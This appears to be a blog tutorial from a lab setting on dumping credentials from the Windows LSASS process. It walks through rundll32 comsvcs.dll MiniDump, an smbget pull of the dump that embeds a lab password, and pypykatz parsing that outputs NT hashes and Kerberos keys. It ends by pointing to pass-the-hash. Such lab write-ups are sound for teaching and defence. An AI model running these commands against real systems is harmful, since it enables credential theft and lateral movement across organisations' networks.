Post cover image

June 10, 2026

Active Directory Attacks — LSASS Credential Dumping

LSASS Credential Dumping is a technique where an attacker extracts sensitive authentication material (passwords, hashes, tickets) from the…

Osec

3 min read

LSASS Credential Dumping is a technique where an attacker extracts sensitive authentication material (passwords, hashes, tickets) from the memory of the Local Security Authority Subsystem Service (LSASS.exe).

LSASS is a core Windows process responsible for user authentication (NTLM and Kerberos), enforcing security policies, and storing credential material in memory after login; this design supports Single Sign-On but also creates an opportunity for attackers, since credentials remain in LSASS memory and Windows allows sufficiently privileged processes (e.g., running as SYSTEM or administrator) to read process memory, enabling an attacker who has gained elevated privileges to access LSASS and extract sensitive authentication data.

From LSASS memory, attackers can retrieve:

  • Plaintext passwords (sometimes)
  • NTLM hashes
  • Kerberos tickets (TGT / TGS)
  • Cached domain credentials

Attack

the attack flow

  1. Attacker gains:
  • Local admin or SYSTEM privileges

  1. Accesses LSASS process memory

  2. Dumps credentials using tools like:

  • Mimikatz

also we can extract credentials from a dump file created by ProcDump or Task Manager ( a .dmp file ) using tools like pypykatz

Demo part:

for this demo we will perform the attack manually ( dumping the lsass.exe memory then extracting credentials from the dump file )

now let's perform the attack:

first let's get an elevated powershell session:

Start-Process -verb runas powershell.exe

find the process id (PID) of the lsass.exe process:

PS C:\> tasklist | findstr 'lsass.exe'
lsass.exe                      672 Services                   0    195,892 K

now let's dump the process memory.

for this we will abuse a legitimate, built-in Windows component (comsvcs.dll) to dump the process memory of lsass.exe

rundll32.exe comsvcs.dll MiniDump 672 cacke full

ls
-a----        3/30/2026   4:13 AM      200582292 cacke

Argument Breakdown

  • rundll32.exe a native windows utility used to execute functions stored inside Dynamic Link Library ( .dll ) files as if they were standalone programs.
  • comsvcs.dll The "Component Services" system library native to windows, which contains a built-in debugging function used to create process memory dumps.
  • MiniDump The specific function inside comsvcs.dll being called to execute and write the process memory dump.
  • 672 The process Identifier ( PID ) of the target program we want to dump , in our case this is the PID of lsass.exe
  • cacke The target file path and filename where the memory dump will be written , in this case we name it cacke )
  • full The dump type modifier, instructing the function to capture the entire memory space of the process rather than a partial summary.

now we have a memory dump of the lsass.exe process. let's transfer it to our attacking machine to process it !

the dump file is large, so before we transfer it to our machine we need to compress it so it get smaller.

smbget smb://INLANEFREIGHT.LOCAL/users/htb-student_adm/desktop/cacke.rar -U 'INLANEFREIGHT.LOCAL/htb-student_adm'%'Academy_student_DA!'

Using domain: INLANEFREIGHT.LOCAL, user: htb-student_adm
smb://INLANEFREIGHT.LOCAL/users/htb-student_adm/desktop/cacke.rar
Downloaded 36.94MB in 523 seconds

decompress cacke.rar

unrar x cacke.rar

check the file

file cacke
cacke: Mini DuMP crash report, 13 streams, Mon Mar 30 11:13:46 2026, 0x6 type

now the exciting part ! , extracting the credentials from the dump file using pypycatz

pypykatz lsa minidump cacke

Argument Breakdown

  • pypykatz: The primary Python-based executable used to parse and decrypt Windows authentication data without needing a Windows operating system. ( on linux )
  • lsa: The sub-command that instructs the tool to target the Local Security Authority (LSA) structures inside the dump file.
  • minidump: The specific module choice telling the tool that the source data is a standard Windows process memory dump file (.dmp).
  • cacke: The filename or file path of the specific LSASS memory dump file that pypykatz is being ordered to read and analyze.
pypykatz lsa minidump cacke
/usr/lib/python3/dist-packages/pypykatz/_version.py:11: SyntaxWarning: invalid escape sequence '\.'
  """
INFO:root:Parsing file cacke
FILE: ======== cacke =======
== LogonSession ==
authentication_id 1031186 (fbc12)
session_id 0
username htb-student_adm
domainname INLANEFREIGHT
logon_server ACADEMY-EA-DC01
logon_time 2026-03-30T10:55:59.186047+00:00
sid S-1-5-21-3842939050-3880317879-2865463114-5603
luid 1031186

== LogonSession ==
authentication_id 479581 (7515d)
session_id 0
username ACADEMY-EA-DC01$
domainname INLANEFREIGHT
logon_server
logon_time 2026-03-30T10:30:34.951629+00:00
sid S-1-5-18
luid 479581
 == Kerberos ==
  Username: ACADEMY-EA-DC01$
  Domain: INLANEFREIGHT.LOCAL

== LogonSession ==
authentication_id 46034 (b3d2)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server
logon_time 2026-03-30T10:24:59.748513+00:00
sid S-1-5-96-0-1
luid 46034
 == MSV ==
  Username: ACADEMY-EA-DC01$
  Domain: INLANEFREIGHT
  LM: NA
  NT: 855ced84aa01080cee4fdbc755a08449
  SHA1: 975cf44838722527069fe3383790ca5943473793
  DPAPI: NA
 == WDIGEST [b3d2]==
  username ACADEMY-EA-DC01$
  domainname INLANEFREIGHT
  password None
 == Kerberos ==
  Username: ACADEMY-EA-DC01$
  Domain: INLANEFREIGHT.LOCAL
  Password: 73204013df6df50dda1bd070f9c810caa741e575f05fa57ce3c9c271c4819f12743287cfd5cb60c300501ad0c2df0b653ee56a001ebacc4efc63ebe8643e4917aba80f35571f80759d8bcdc7db1d97b1318f71ee557764fd875ceaeb04d2362602caf6bd737e1debc7d0de0472b0fd0d91284360a6bfab706fbb6ea618598e9862eec6bf3b3a1fe7ee5df5bb58dfb4374a2445aadacf24fa6630035a13052ecf2d5bf0dfd9a0251bba64331f22a6c1ff121f04ddd6803f2e50976a123a979d4f957f4b6232d4778e862d0d212939d0a224d0c07fd0a58368d121638d0cb5fac1ab79e427a78c12259284d81169a6e114
 == WDIGEST [b3d2]==
  username ACADEMY-EA-DC01$
  domainname INLANEFREIGHT
  password None

== LogonSession ==
authentication_id 45998 (b3ae)
session_id 0
username UMFD-0
domainname Font Driver Host
logon_server
logon_time 2026-03-30T10:24:59.732900+00:00
sid S-1-5-96-0-0
luid 45998
 == MSV ==
  Username: ACADEMY-EA-DC01$
  Domain: INLANEFREIGHT
  LM: NA
  NT: 855ced84aa01080cee4fdbc755a08449
  SHA1: 975cf44838722527069fe3383790ca5943473793
  DPAPI: NA
 == WDIGEST [b3ae]==
  username ACADEMY-EA-DC01$
  domainname INLANEFREIGHT
  password None
 == Kerberos ==
  Username: ACADEMY-EA-DC01$
  Domain: INLANEFREIGHT.LOCAL
  Password: 73204013df6df50dda1bd070f9c810caa741e575f05fa57ce3c9c271c4819f12743287cfd5cb60c300501ad0c2df0b653ee56a001ebacc4efc63ebe8643e4917aba80f35571f80759d8bcdc7db1d97b1318f71ee557764fd875ceaeb04d2362602caf6bd737e1debc7d0de0472b0fd0d91284360a6bfab706fbb6ea618598e9862eec6bf3b3a1fe7ee5df5bb58dfb4374a2445aadacf24fa6630035a13052ecf2d5bf0dfd9a0251bba64331f22a6c1ff121f04ddd6803f2e50976a123a979d4f957f4b6232d4778e862d0d212939d0a224d0c07fd0a58368d121638d0cb5fac1ab79e427a78c12259284d81169a6e114
 == WDIGEST [b3ae]==
  username ACADEMY-EA-DC01$
  domainname INLANEFREIGHT
  password None

== LogonSession ==
authentication_id 45966 (b38e)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server
logon_time 2026-03-30T10:24:59.732900+00:00
sid S-1-5-96-0-1
luid 45966
 == MSV ==
  Username: ACADEMY-EA-DC01$
  Domain: INLANEFREIGHT
  LM: NA
  NT: 458260fc91c9ac58626bdf85ce8d51eb
  SHA1: 5c47a260e35b34267a2776324e5dac9e48f89d1c
  DPAPI: NA
 == WDIGEST [b38e]==
  username ACADEMY-EA-DC01$
  domainname INLANEFREIGHT
  password None
 == Kerberos ==
  Username: ACADEMY-EA-DC01$
  Domain: INLANEFREIGHT.LOCAL
  Password: 1daa00f744c675fc3b4159e417900e1d91fb4a770ab6e6d651d2e196b3d740c800a137cf1ce343532e8ce94885ef43f4110279f8f46c3d6adaac95d519a448742ecd3732416e32e05dbd37eb0273d96df2446b0ebfdf6b37df9d4570f1618e920c7769d46e78d101e073215907055c242ad62d1afe841ea1c3644d1a19c914dbad0de6af57c30dc5c0df5448d4b9d58d72cd033a837728b1e68b1d74d65443bac70d9c1c10fa7b4dcfcd4d1eb393621cca67eb2b42805e6d79090453e3a164341d65dc17386917879297266345f5c42da5548c536ffa4afbbf329be221acdc2453c171169165607068122527d2abb34b
 == WDIGEST [b38e]==
  username ACADEMY-EA-DC01$
  domainname INLANEFREIGHT
  password None
...

And like that ! , we manage to extract the credentials out of the lsass.exe process memory.

we can use the extracted hashes for lateral movement ( pass-the-hash , etc… )